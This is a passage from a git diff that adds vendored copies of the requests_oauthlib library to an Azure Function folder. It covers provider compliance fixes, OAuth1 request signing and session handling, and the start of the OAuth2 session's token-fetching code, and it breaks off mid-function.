+from json import dumps, loads +import re + +from oauthlib.common import to_unicode + + +def plentymarkets_compliance_fix(session): + def _to_snake_case(n): + return re.sub("(.)([A-Z][a-z]+)", r"\1_\2", n).lower() + + def _compliance_fix(r): + # Plenty returns the Token in CamelCase instead of _ + if ( + "application/json" in r.headers.get("content-type", {}) + and r.status_code == 200 + ): + token = loads(r.text) + else: + return r + + fixed_token = {} + for k, v in token.items(): + fixed_token[_to_snake_case(k)] = v + + r._content = to_unicode(dumps(fixed_token)).encode("UTF-8") + return r + + session.register_compliance_hook("access_token_response", _compliance_fix) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/slack.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/slack.py new file mode 100644 index 0000000..13a5d1b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/slack.py @@ -0,0 +1,37 @@ +try: + from urlparse import urlparse, parse_qs +except ImportError: + from urllib.parse import urlparse, parse_qs + +from oauthlib.common import add_params_to_uri + + +def slack_compliance_fix(session): + def _non_compliant_param_name(url, headers, data): + # If the user has already specified the token, either in the URL + # or in a data dictionary, then there's nothing to do. + # If the specified token is different from ``session.access_token``, + # we assume the user intends to override the access token. + url_query = dict(parse_qs(urlparse(url).query)) + token = url_query.get("token") + if not token and isinstance(data, dict): + token = data.get("token") + + if token: + # Nothing to do, just return. + return url, headers, data + + if not data: + data = {"token": session.access_token} + elif isinstance(data, dict): + data["token"] = session.access_token + else: + # ``data`` is something other than a dict: maybe a stream, + # maybe a file object, maybe something else. We can't easily + # modify it, so we'll set the token by modifying the URL instead. 
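+            # add_params_to_uri (from oauthlib.common, imported above)
+            # appends the ("token", <access token>) pair to the query
+            # string of ``url``.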
+ token = [("token", session.access_token)] + url = add_params_to_uri(url, token) + return url, headers, data + + session.register_compliance_hook("protected_request", _non_compliant_param_name) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/weibo.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/weibo.py new file mode 100644 index 0000000..da97b2f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/weibo.py @@ -0,0 +1,15 @@ +from json import loads, dumps + +from oauthlib.common import to_unicode + + +def weibo_compliance_fix(session): + def _missing_token_type(r): + token = loads(r.text) + token["token_type"] = "Bearer" + r._content = to_unicode(dumps(token)).encode("UTF-8") + return r + + session._client.default_token_placement = "query" + session.register_compliance_hook("access_token_response", _missing_token_type) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_auth.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_auth.py new file mode 100644 index 0000000..213f8cd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_auth.py @@ -0,0 +1,117 @@ +# -*- coding: utf-8 -*- +from __future__ import unicode_literals + +import logging + +from oauthlib.common import extract_params +from oauthlib.oauth1 import Client, SIGNATURE_HMAC, SIGNATURE_TYPE_AUTH_HEADER +from oauthlib.oauth1 import SIGNATURE_TYPE_BODY +from requests.compat import is_py3 +from requests.utils import to_native_string +from requests.auth import AuthBase + +CONTENT_TYPE_FORM_URLENCODED = "application/x-www-form-urlencoded" +CONTENT_TYPE_MULTI_PART = "multipart/form-data" + +if is_py3: + unicode = str + +log = logging.getLogger(__name__) + +# OBS!: Correct signing of requests are conditional on invoking OAuth1 +# as the last step of preparing a request, or at least having the +# content-type set properly. +class OAuth1(AuthBase): + """Signs the request using OAuth 1 (RFC5849)""" + + client_class = Client + + def __init__( + self, + client_key, + client_secret=None, + resource_owner_key=None, + resource_owner_secret=None, + callback_uri=None, + signature_method=SIGNATURE_HMAC, + signature_type=SIGNATURE_TYPE_AUTH_HEADER, + rsa_key=None, + verifier=None, + decoding="utf-8", + client_class=None, + force_include_body=False, + **kwargs + ): + + try: + signature_type = signature_type.upper() + except AttributeError: + pass + + client_class = client_class or self.client_class + + self.force_include_body = force_include_body + + self.client = client_class( + client_key, + client_secret, + resource_owner_key, + resource_owner_secret, + callback_uri, + signature_method, + signature_type, + rsa_key, + verifier, + decoding=decoding, + **kwargs + ) + + def __call__(self, r): + """Add OAuth parameters to the request. + + Parameters may be included from the body if the content-type is + urlencoded, if no content type is set a guess is made. + """ + # Overwriting url is safe here as request will not modify it past + # this point. 
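+        # What gets signed depends on the content type worked out below:
+        # form-encoded bodies are included in the signature base string,
+        # while other bodies are omitted unless force_include_body is set.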
+ log.debug("Signing request %s using client %s", r, self.client) + + content_type = r.headers.get("Content-Type", "") + if ( + not content_type + and extract_params(r.body) + or self.client.signature_type == SIGNATURE_TYPE_BODY + ): + content_type = CONTENT_TYPE_FORM_URLENCODED + if not isinstance(content_type, unicode): + content_type = content_type.decode("utf-8") + + is_form_encoded = CONTENT_TYPE_FORM_URLENCODED in content_type + + log.debug( + "Including body in call to sign: %s", + is_form_encoded or self.force_include_body, + ) + + if is_form_encoded: + r.headers["Content-Type"] = CONTENT_TYPE_FORM_URLENCODED + r.url, headers, r.body = self.client.sign( + unicode(r.url), unicode(r.method), r.body or "", r.headers + ) + elif self.force_include_body: + # To allow custom clients to work on non form encoded bodies. + r.url, headers, r.body = self.client.sign( + unicode(r.url), unicode(r.method), r.body or "", r.headers + ) + else: + # Omit body data in the signing of non form-encoded requests + r.url, headers, _ = self.client.sign( + unicode(r.url), unicode(r.method), None, r.headers + ) + + r.prepare_headers(headers) + r.url = to_native_string(r.url) + log.debug("Updated url: %s", r.url) + log.debug("Updated headers: %s", headers) + log.debug("Updated body: %r", r.body) + return r diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_session.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_session.py new file mode 100644 index 0000000..e2e3e79 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_session.py @@ -0,0 +1,400 @@ +from __future__ import unicode_literals + +try: + from urlparse import urlparse +except ImportError: + from urllib.parse import urlparse + +import logging + +from oauthlib.common import add_params_to_uri +from oauthlib.common import urldecode as _urldecode +from oauthlib.oauth1 import SIGNATURE_HMAC, SIGNATURE_RSA, SIGNATURE_TYPE_AUTH_HEADER +import requests + +from . import OAuth1 + + +log = logging.getLogger(__name__) + + +def urldecode(body): + """Parse query or json to python dictionary""" + try: + return _urldecode(body) + except Exception: + import json + + return json.loads(body) + + +class TokenRequestDenied(ValueError): + def __init__(self, message, response): + super(TokenRequestDenied, self).__init__(message) + self.response = response + + @property + def status_code(self): + """For backwards-compatibility purposes""" + return self.response.status_code + + +class TokenMissing(ValueError): + def __init__(self, message, response): + super(TokenMissing, self).__init__(message) + self.response = response + + +class VerifierMissing(ValueError): + pass + + +class OAuth1Session(requests.Session): + """Request signing and convenience methods for the oauth dance. + + What is the difference between OAuth1Session and OAuth1? + + OAuth1Session actually uses OAuth1 internally and its purpose is to assist + in the OAuth workflow through convenience methods to prepare authorization + URLs and parse the various token and redirection responses. It also provide + rudimentary validation of responses. + + An example of the OAuth workflow using a basic CLI app and Twitter. + + >>> # Credentials obtained during the registration. 
+ >>> client_key = 'client key' + >>> client_secret = 'secret' + >>> callback_uri = 'https://127.0.0.1/callback' + >>> + >>> # Endpoints found in the OAuth provider API documentation + >>> request_token_url = 'https://api.twitter.com/oauth/request_token' + >>> authorization_url = 'https://api.twitter.com/oauth/authorize' + >>> access_token_url = 'https://api.twitter.com/oauth/access_token' + >>> + >>> oauth_session = OAuth1Session(client_key,client_secret=client_secret, callback_uri=callback_uri) + >>> + >>> # First step, fetch the request token. + >>> oauth_session.fetch_request_token(request_token_url) + { + 'oauth_token': 'kjerht2309u', + 'oauth_token_secret': 'lsdajfh923874', + } + >>> + >>> # Second step. Follow this link and authorize + >>> oauth_session.authorization_url(authorization_url) + 'https://api.twitter.com/oauth/authorize?oauth_token=sdf0o9823sjdfsdf&oauth_callback=https%3A%2F%2F127.0.0.1%2Fcallback' + >>> + >>> # Third step. Fetch the access token + >>> redirect_response = raw_input('Paste the full redirect URL here.') + >>> oauth_session.parse_authorization_response(redirect_response) + { + 'oauth_token: 'kjerht2309u', + 'oauth_token_secret: 'lsdajfh923874', + 'oauth_verifier: 'w34o8967345', + } + >>> oauth_session.fetch_access_token(access_token_url) + { + 'oauth_token': 'sdf0o9823sjdfsdf', + 'oauth_token_secret': '2kjshdfp92i34asdasd', + } + >>> # Done. You can now make OAuth requests. + >>> status_url = 'http://api.twitter.com/1/statuses/update.json' + >>> new_status = {'status': 'hello world!'} + >>> oauth_session.post(status_url, data=new_status) + + """ + + def __init__( + self, + client_key, + client_secret=None, + resource_owner_key=None, + resource_owner_secret=None, + callback_uri=None, + signature_method=SIGNATURE_HMAC, + signature_type=SIGNATURE_TYPE_AUTH_HEADER, + rsa_key=None, + verifier=None, + client_class=None, + force_include_body=False, + **kwargs + ): + """Construct the OAuth 1 session. + + :param client_key: A client specific identifier. + :param client_secret: A client specific secret used to create HMAC and + plaintext signatures. + :param resource_owner_key: A resource owner key, also referred to as + request token or access token depending on + when in the workflow it is used. + :param resource_owner_secret: A resource owner secret obtained with + either a request or access token. Often + referred to as token secret. + :param callback_uri: The URL the user is redirect back to after + authorization. + :param signature_method: Signature methods determine how the OAuth + signature is created. The three options are + oauthlib.oauth1.SIGNATURE_HMAC (default), + oauthlib.oauth1.SIGNATURE_RSA and + oauthlib.oauth1.SIGNATURE_PLAIN. + :param signature_type: Signature type decides where the OAuth + parameters are added. Either in the + Authorization header (default) or to the URL + query parameters or the request body. Defined as + oauthlib.oauth1.SIGNATURE_TYPE_AUTH_HEADER, + oauthlib.oauth1.SIGNATURE_TYPE_QUERY and + oauthlib.oauth1.SIGNATURE_TYPE_BODY + respectively. + :param rsa_key: The private RSA key as a string. Can only be used with + signature_method=oauthlib.oauth1.SIGNATURE_RSA. + :param verifier: A verifier string to prove authorization was granted. + :param client_class: A subclass of `oauthlib.oauth1.Client` to use with + `requests_oauthlib.OAuth1` instead of the default + :param force_include_body: Always include the request body in the + signature creation. 
+ :param **kwargs: Additional keyword arguments passed to `OAuth1` + """ + super(OAuth1Session, self).__init__() + self._client = OAuth1( + client_key, + client_secret=client_secret, + resource_owner_key=resource_owner_key, + resource_owner_secret=resource_owner_secret, + callback_uri=callback_uri, + signature_method=signature_method, + signature_type=signature_type, + rsa_key=rsa_key, + verifier=verifier, + client_class=client_class, + force_include_body=force_include_body, + **kwargs + ) + self.auth = self._client + + @property + def token(self): + oauth_token = self._client.client.resource_owner_key + oauth_token_secret = self._client.client.resource_owner_secret + oauth_verifier = self._client.client.verifier + + token_dict = {} + if oauth_token: + token_dict["oauth_token"] = oauth_token + if oauth_token_secret: + token_dict["oauth_token_secret"] = oauth_token_secret + if oauth_verifier: + token_dict["oauth_verifier"] = oauth_verifier + + return token_dict + + @token.setter + def token(self, value): + self._populate_attributes(value) + + @property + def authorized(self): + """Boolean that indicates whether this session has an OAuth token + or not. If `self.authorized` is True, you can reasonably expect + OAuth-protected requests to the resource to succeed. If + `self.authorized` is False, you need the user to go through the OAuth + authentication dance before OAuth-protected requests to the resource + will succeed. + """ + if self._client.client.signature_method == SIGNATURE_RSA: + # RSA only uses resource_owner_key + return bool(self._client.client.resource_owner_key) + else: + # other methods of authentication use all three pieces + return ( + bool(self._client.client.client_secret) + and bool(self._client.client.resource_owner_key) + and bool(self._client.client.resource_owner_secret) + ) + + def authorization_url(self, url, request_token=None, **kwargs): + """Create an authorization URL by appending request_token and optional + kwargs to url. + + This is the second step in the OAuth 1 workflow. The user should be + redirected to this authorization URL, grant access to you, and then + be redirected back to you. The redirection back can either be specified + during client registration or by supplying a callback URI per request. + + :param url: The authorization endpoint URL. + :param request_token: The previously obtained request token. + :param kwargs: Optional parameters to append to the URL. + :returns: The authorization URL with new parameters embedded. + + An example using a registered default callback URI. + + >>> request_token_url = 'https://api.twitter.com/oauth/request_token' + >>> authorization_url = 'https://api.twitter.com/oauth/authorize' + >>> oauth_session = OAuth1Session('client-key', client_secret='secret') + >>> oauth_session.fetch_request_token(request_token_url) + { + 'oauth_token': 'sdf0o9823sjdfsdf', + 'oauth_token_secret': '2kjshdfp92i34asdasd', + } + >>> oauth_session.authorization_url(authorization_url) + 'https://api.twitter.com/oauth/authorize?oauth_token=sdf0o9823sjdfsdf' + >>> oauth_session.authorization_url(authorization_url, foo='bar') + 'https://api.twitter.com/oauth/authorize?oauth_token=sdf0o9823sjdfsdf&foo=bar' + + An example using an explicit callback URI. 
+
+ >>> request_token_url = 'https://api.twitter.com/oauth/request_token'
+ >>> authorization_url = 'https://api.twitter.com/oauth/authorize'
+ >>> oauth_session = OAuth1Session('client-key', client_secret='secret', callback_uri='https://127.0.0.1/callback')
+ >>> oauth_session.fetch_request_token(request_token_url)
+ {
+ 'oauth_token': 'sdf0o9823sjdfsdf',
+ 'oauth_token_secret': '2kjshdfp92i34asdasd',
+ }
+ >>> oauth_session.authorization_url(authorization_url)
+ 'https://api.twitter.com/oauth/authorize?oauth_token=sdf0o9823sjdfsdf&oauth_callback=https%3A%2F%2F127.0.0.1%2Fcallback'
+ """
+ kwargs["oauth_token"] = request_token or self._client.client.resource_owner_key
+ log.debug("Adding parameters %s to url %s", kwargs, url)
+ return add_params_to_uri(url, kwargs.items())
+
+ def fetch_request_token(self, url, realm=None, **request_kwargs):
+ r"""Fetch a request token.
+
+ This is the first step in the OAuth 1 workflow. A request token is
+ obtained by making a signed POST request to url. The token is then
+ parsed from the application/x-www-form-urlencoded response and ready
+ to be used to construct an authorization url.
+
+ :param url: The request token endpoint URL.
+ :param realm: A list of realms to request access to.
+ :param \*\*request_kwargs: Optional arguments passed to the ``post``
+ method of ``requests.Session``.
+ :returns: The response in dict format.
+
+ Note that a previously set callback_uri will be reset for your
+ convenience, or else signature creation will be incorrect on
+ consecutive requests.
+
+ >>> request_token_url = 'https://api.twitter.com/oauth/request_token'
+ >>> oauth_session = OAuth1Session('client-key', client_secret='secret')
+ >>> oauth_session.fetch_request_token(request_token_url)
+ {
+ 'oauth_token': 'sdf0o9823sjdfsdf',
+ 'oauth_token_secret': '2kjshdfp92i34asdasd',
+ }
+ """
+ self._client.client.realm = " ".join(realm) if realm else None
+ token = self._fetch_token(url, **request_kwargs)
+ log.debug("Resetting callback_uri and realm (not needed in next phase).")
+ self._client.client.callback_uri = None
+ self._client.client.realm = None
+ return token
+
+ def fetch_access_token(self, url, verifier=None, **request_kwargs):
+ """Fetch an access token.
+
+ This is the final step in the OAuth 1 workflow. An access token is
+ obtained using all previously obtained credentials, including the
+ verifier from the authorization step.
+
+ Note that a previously set verifier will be reset for your
+ convenience, or else signature creation will be incorrect on
+ consecutive requests.
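+
+ If the verifier was captured out of band it can be supplied directly
+ instead of parsing the redirect; a minimal sketch, with placeholder
+ token and verifier values:
+
+ >>> oauth_session = OAuth1Session('client-key', client_secret='secret', resource_owner_key='kjerht2309u', resource_owner_secret='lsdajfh923874')
+ >>> oauth_session.fetch_access_token('https://api.twitter.com/oauth/access_token', verifier='w34o8967345')
+ {
+ 'oauth_token': 'sdf0o9823sjdfsdf',
+ 'oauth_token_secret': '2kjshdfp92i34asdasd',
+ }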
+
+ >>> access_token_url = 'https://api.twitter.com/oauth/access_token'
+ >>> redirect_response = 'https://127.0.0.1/callback?oauth_token=kjerht2309u&oauth_token_secret=lsdajfh923874&oauth_verifier=w34o8967345'
+ >>> oauth_session = OAuth1Session('client-key', client_secret='secret')
+ >>> oauth_session.parse_authorization_response(redirect_response)
+ {
+ 'oauth_token': 'kjerht2309u',
+ 'oauth_token_secret': 'lsdajfh923874',
+ 'oauth_verifier': 'w34o8967345',
+ }
+ >>> oauth_session.fetch_access_token(access_token_url)
+ {
+ 'oauth_token': 'sdf0o9823sjdfsdf',
+ 'oauth_token_secret': '2kjshdfp92i34asdasd',
+ }
+ """
+ if verifier:
+ self._client.client.verifier = verifier
+ if not getattr(self._client.client, "verifier", None):
+ raise VerifierMissing("No client verifier has been set.")
+ token = self._fetch_token(url, **request_kwargs)
+ log.debug("Resetting verifier attribute, should not be used anymore.")
+ self._client.client.verifier = None
+ return token
+
+ def parse_authorization_response(self, url):
+ """Extract parameters from the post authorization redirect response URL.
+
+ :param url: The full URL that resulted from the user being redirected
+ back from the OAuth provider to you, the client.
+ :returns: A dict of parameters extracted from the URL.
+
+ >>> redirect_response = 'https://127.0.0.1/callback?oauth_token=kjerht2309u&oauth_token_secret=lsdajfh923874&oauth_verifier=w34o8967345'
+ >>> oauth_session = OAuth1Session('client-key', client_secret='secret')
+ >>> oauth_session.parse_authorization_response(redirect_response)
+ {
+ 'oauth_token': 'kjerht2309u',
+ 'oauth_token_secret': 'lsdajfh923874',
+ 'oauth_verifier': 'w34o8967345',
+ }
+ """
+ log.debug("Parsing token from query part of url %s", url)
+ token = dict(urldecode(urlparse(url).query))
+ log.debug("Updating internal client token attribute.")
+ self._populate_attributes(token)
+ self.token = token
+ return token
+
+ def _populate_attributes(self, token):
+ if "oauth_token" in token:
+ self._client.client.resource_owner_key = token["oauth_token"]
+ else:
+ raise TokenMissing(
+ "Response does not contain a token: {resp}".format(resp=token), token
+ )
+ if "oauth_token_secret" in token:
+ self._client.client.resource_owner_secret = token["oauth_token_secret"]
+ if "oauth_verifier" in token:
+ self._client.client.verifier = token["oauth_verifier"]
+
+ def _fetch_token(self, url, **request_kwargs):
+ log.debug("Fetching token from %s using client %s", url, self._client.client)
+ r = self.post(url, **request_kwargs)
+
+ if r.status_code >= 400:
+ error = "Token request failed with code %s, response was '%s'."
+ raise TokenRequestDenied(error % (r.status_code, r.text), r)
+
+ log.debug('Decoding token from response "%s"', r.text)
+ try:
+ token = dict(urldecode(r.text.strip()))
+ except ValueError as e:
+ error = (
+ "Unable to decode token from token response. "
+ "This is commonly caused by an unsuccessful request where"
+ " a non urlencoded error message is returned. "
+ "The decoding error was %s"
+ "" % e
+ )
+ raise ValueError(error)
+
+ log.debug("Obtained token %s", token)
+ log.debug("Updating internal client attributes from token data.")
+ self._populate_attributes(token)
+ self.token = token
+ return token
+
+ def rebuild_auth(self, prepared_request, response):
+ """
+ When being redirected we should always strip Authorization
+ header, since nonce may not be reused as per OAuth spec.
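+ The session auth handler is then re-applied below, so the redirected
+ request is signed again with a fresh nonce.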
+ """ + if "Authorization" in prepared_request.headers: + # If we get redirected to a new host, we should strip out + # any authentication headers. + prepared_request.headers.pop("Authorization", True) + prepared_request.prepare_auth(self.auth) + return diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_auth.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_auth.py new file mode 100644 index 0000000..04c71e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_auth.py @@ -0,0 +1,37 @@ +from __future__ import unicode_literals +from oauthlib.oauth2 import WebApplicationClient, InsecureTransportError +from oauthlib.oauth2 import is_secure_transport +from requests.auth import AuthBase + + +class OAuth2(AuthBase): + """Adds proof of authorization (OAuth2 token) to the request.""" + + def __init__(self, client_id=None, client=None, token=None): + """Construct a new OAuth 2 authorization object. + + :param client_id: Client id obtained during registration + :param client: :class:`oauthlib.oauth2.Client` to be used. Default is + WebApplicationClient which is useful for any + hosted application but not mobile or desktop. + :param token: Token dictionary, must include access_token + and token_type. + """ + self._client = client or WebApplicationClient(client_id, token=token) + if token: + for k, v in token.items(): + setattr(self._client, k, v) + + def __call__(self, r): + """Append an OAuth 2 token to the request. + + Note that currently HTTPS is required for all requests. There may be + a token type that allows for plain HTTP in the future and then this + should be updated to allow plain HTTP on a white list basis. + """ + if not is_secure_transport(r.url): + raise InsecureTransportError() + r.url, r.headers, r.body = self._client.add_token( + r.url, http_method=r.method, body=r.body, headers=r.headers + ) + return r diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_session.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_session.py new file mode 100644 index 0000000..5bd352e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_session.py @@ -0,0 +1,540 @@ +from __future__ import unicode_literals + +import logging + +from oauthlib.common import generate_token, urldecode +from oauthlib.oauth2 import WebApplicationClient, InsecureTransportError +from oauthlib.oauth2 import LegacyApplicationClient +from oauthlib.oauth2 import TokenExpiredError, is_secure_transport +import requests + +log = logging.getLogger(__name__) + + +class TokenUpdated(Warning): + def __init__(self, token): + super(TokenUpdated, self).__init__() + self.token = token + + +class OAuth2Session(requests.Session): + """Versatile OAuth 2 extension to :class:`requests.Session`. + + Supports any grant type adhering to :class:`oauthlib.oauth2.Client` spec + including the four core OAuth 2 grants. + + Can be used to create authorization urls, fetch tokens and access protected + resources using the :class:`requests.Session` interface you are used to. 
+
+ - :class:`oauthlib.oauth2.WebApplicationClient` (default): Authorization Code Grant
+ - :class:`oauthlib.oauth2.MobileApplicationClient`: Implicit Grant
+ - :class:`oauthlib.oauth2.LegacyApplicationClient`: Password Credentials Grant
+ - :class:`oauthlib.oauth2.BackendApplicationClient`: Client Credentials Grant
+
+ Note that the only time you will be using Implicit Grant from Python is if
+ you are driving a user agent able to obtain URL fragments.
+ """
+
+ def __init__(
+ self,
+ client_id=None,
+ client=None,
+ auto_refresh_url=None,
+ auto_refresh_kwargs=None,
+ scope=None,
+ redirect_uri=None,
+ token=None,
+ state=None,
+ token_updater=None,
+ **kwargs
+ ):
+ """Construct a new OAuth 2 client session.
+
+ :param client_id: Client id obtained during registration
+ :param client: :class:`oauthlib.oauth2.Client` to be used. Default is
+ WebApplicationClient which is useful for any
+ hosted application but not mobile or desktop.
+ :param scope: List of scopes you wish to request access to
+ :param redirect_uri: Redirect URI you registered as callback
+ :param token: Token dictionary, must include access_token
+ and token_type.
+ :param state: State string used to prevent CSRF. This will be given
+ when creating the authorization url and must be supplied
+ when parsing the authorization response.
+ Can be either a string or a no-argument callable.
+ :param auto_refresh_url: Refresh token endpoint URL, must be HTTPS. Supply
+ this if you wish the client to automatically refresh
+ your access tokens.
+ :param auto_refresh_kwargs: Extra arguments to pass to the refresh token
+ endpoint.
+ :param token_updater: Method with one argument, token, to be used to update
+ your token database on automatic token refresh. If not
+ set a TokenUpdated warning will be raised when a token
+ has been refreshed. This warning will carry the token
+ in its token argument.
+ :param kwargs: Arguments to pass to the Session constructor.
+ """
+ super(OAuth2Session, self).__init__(**kwargs)
+ self._client = client or WebApplicationClient(client_id, token=token)
+ self.token = token or {}
+ self.scope = scope
+ self.redirect_uri = redirect_uri
+ self.state = state or generate_token
+ self._state = state
+ self.auto_refresh_url = auto_refresh_url
+ self.auto_refresh_kwargs = auto_refresh_kwargs or {}
+ self.token_updater = token_updater
+
+ # Ensure that requests doesn't do any automatic auth. See #278.
+ # The default behavior can be re-enabled by setting auth to None.
+ self.auth = lambda r: r
+
+ # Allow customizations for non-compliant providers through various
+ # hooks to adjust requests and responses.
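+ # The hook sets below start empty; provider quirks are handled by
+ # adding callables via register_compliance_hook().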
+ self.compliance_hook = {
+ "access_token_response": set(),
+ "refresh_token_response": set(),
+ "protected_request": set(),
+ }
+
+ def new_state(self):
+ """Generates a state string to be used in authorizations."""
+ try:
+ self._state = self.state()
+ log.debug("Generated new state %s.", self._state)
+ except TypeError:
+ self._state = self.state
+ log.debug("Re-using previously supplied state %s.", self._state)
+ return self._state
+
+ @property
+ def client_id(self):
+ return getattr(self._client, "client_id", None)
+
+ @client_id.setter
+ def client_id(self, value):
+ self._client.client_id = value
+
+ @client_id.deleter
+ def client_id(self):
+ del self._client.client_id
+
+ @property
+ def token(self):
+ return getattr(self._client, "token", None)
+
+ @token.setter
+ def token(self, value):
+ self._client.token = value
+ self._client.populate_token_attributes(value)
+
+ @property
+ def access_token(self):
+ return getattr(self._client, "access_token", None)
+
+ @access_token.setter
+ def access_token(self, value):
+ self._client.access_token = value
+
+ @access_token.deleter
+ def access_token(self):
+ del self._client.access_token
+
+ @property
+ def authorized(self):
+ """Boolean that indicates whether this session has an OAuth token
+ or not. If `self.authorized` is True, you can reasonably expect
+ OAuth-protected requests to the resource to succeed. If
+ `self.authorized` is False, you need the user to go through the OAuth
+ authentication dance before OAuth-protected requests to the resource
+ will succeed.
+ """
+ return bool(self.access_token)
+
+ def authorization_url(self, url, state=None, **kwargs):
+ """Form an authorization URL.
+
+ :param url: Authorization endpoint url, must be HTTPS.
+ :param state: An optional state string for CSRF protection. If not
+ given it will be generated for you.
+ :param kwargs: Extra parameters to include.
+ :return: authorization_url, state
+ """
+ state = state or self.new_state()
+ return (
+ self._client.prepare_request_uri(
+ url,
+ redirect_uri=self.redirect_uri,
+ scope=self.scope,
+ state=state,
+ **kwargs
+ ),
+ state,
+ )
+
+ def fetch_token(
+ self,
+ token_url,
+ code=None,
+ authorization_response=None,
+ body="",
+ auth=None,
+ username=None,
+ password=None,
+ method="POST",
+ force_querystring=False,
+ timeout=None,
+ headers=None,
+ verify=True,
+ proxies=None,
+ include_client_id=None,
+ client_secret=None,
+ cert=None,
+ **kwargs
+ ):
+ """Generic method for fetching an access token from the token endpoint.
+
+ If you are using the MobileApplicationClient you will want to use
+ `token_from_fragment` instead of `fetch_token`.
+
+ The current implementation enforces the RFC guidelines.
+
+ :param token_url: Token endpoint URL, must use HTTPS.
+ :param code: Authorization code (used by WebApplicationClients).
+ :param authorization_response: Authorization response URL, the callback
+ URL of the request back to you. Used by
+ WebApplicationClients instead of code.
+ :param body: Optional application/x-www-form-urlencoded body to
+ include in the token request. Prefer kwargs over body.
+ :param auth: An auth tuple or method as accepted by `requests`.
+ :param username: Username required by LegacyApplicationClients to appear
+ in the request body.
+ :param password: Password required by LegacyApplicationClients to appear
+ in the request body.
+ :param method: The HTTP method used to make the request. Defaults
+ to POST, but may also be GET. Other methods should
+ be added as needed.
+ :param force_querystring: If True, force the request body to be sent
+ in the querystring instead.
+ :param timeout: Timeout of the request in seconds.
+ :param headers: Dict of headers to send with the token request,
+ replacing the defaults.
+ :param verify: Verify SSL certificate.
+ :param proxies: The `proxies` argument is passed onto `requests`.
+ :param include_client_id: Should the request body include the
+ `client_id` parameter. Default is `None`,
+ which will attempt to autodetect. This can be
+ forced to always include (True) or never
+ include (False).
+ :param client_secret: The `client_secret` paired to the `client_id`.
+ This is generally required unless provided in the
+ `auth` tuple. If the value is `None`, it will be
+ omitted from the request, however if the value is
+ an empty string, an empty string will be sent.
+ :param cert: Client certificate to send for OAuth 2.0 Mutual-TLS Client
+ Authentication (draft-ietf-oauth-mtls). Can either be the
+ path of a file containing the private key and certificate or
+ a tuple of two filenames for certificate and key.
+ :param kwargs: Extra parameters to include in the token request.
+ :return: A token dict
+ """
+ if not is_secure_transport(token_url):
+ raise InsecureTransportError()
+
+ if not code and authorization_response:
+ self._client.parse_request_uri_response(
+ authorization_response, state=self._state
+ )
+ code = self._client.code
+ elif not code and isinstance(self._client, WebApplicationClient):
+ code = self._client.code
+ if not code:
+ raise ValueError(
+ "Please supply either code or " "authorization_response parameters."
+ )
+
+ # Earlier versions of this library built an HTTPBasicAuth header out of
+ # `username` and `password`. The RFC states, however, that these attributes
+ # must be in the request body and not the header.
+ # If an upstream server is not spec compliant and requires them to
+ # appear as an Authorization header, supply an explicit `auth` argument
+ # to this function.
+ # This check will allow for empty strings, but not `None`.
+ #
+ # References
+ # 4.3.2 - Resource Owner Password Credentials Grant
+ # https://tools.ietf.org/html/rfc6749#section-4.3.2
+
+ if isinstance(self._client, LegacyApplicationClient):
+ if username is None:
+ raise ValueError(
+ "`LegacyApplicationClient` requires both the "
+ "`username` and `password` parameters."
+ )
+ if password is None:
+ raise ValueError(
+ "The required parameter `username` was supplied, "
+ "but `password` was not."
+ )
+
+ # merge username and password into kwargs for `prepare_request_body`
+ if username is not None:
+ kwargs["username"] = username
+ if password is not None:
+ kwargs["password"] = password
+
+ # is an auth explicitly supplied?
+ if auth is not None:
+ # if we're dealing with the default of `include_client_id` (None):
+ # we will assume the `auth` argument is for an RFC compliant server
+ # and we should not send the `client_id` in the body.
+ # This approach allows us to still force the client_id by submitting
+ # `include_client_id=True` along with an `auth` object.
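+ # Default for an explicit auth: leave client_id out of the body.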
+ if include_client_id is None:
+ include_client_id = False
+
+ # otherwise we may need to create an auth header
+ else:
+ # since we don't have an auth header, we MAY need to create one
+ # it is possible that we want to send the `client_id` in the body
+ # if so, `include_client_id` should be set to True
+ # otherwise, we will generate an auth header
+ if include_client_id is not True:
+ client_id = self.client_id
+ if client_id:
+ log.debug(
+ 'Encoding `client_id` "%s" with `client_secret` '
+ "as Basic auth credentials.",
+ client_id,
+ )
+ client_secret = client_secret if client_secret is not None else ""
+ auth = requests.auth.HTTPBasicAuth(client_id, client_secret)
+
+ if include_client_id:
+ # this was pulled out of the params
+ # it needs to be passed into prepare_request_body
+ if client_secret is not None:
+ kwargs["client_secret"] = client_secret
+
+ body = self._client.prepare_request_body(
+ code=code,
+ body=body,
+ redirect_uri=self.redirect_uri,
+ include_client_id=include_client_id,
+ **kwargs
+ )
+
+ headers = headers or {
+ "Accept": "application/json",
+ "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
+ }
+ self.token = {}
+ request_kwargs = {}
+ if method.upper() == "POST":
+ request_kwargs["params" if force_querystring else "data"] = dict(
+ urldecode(body)
+ )
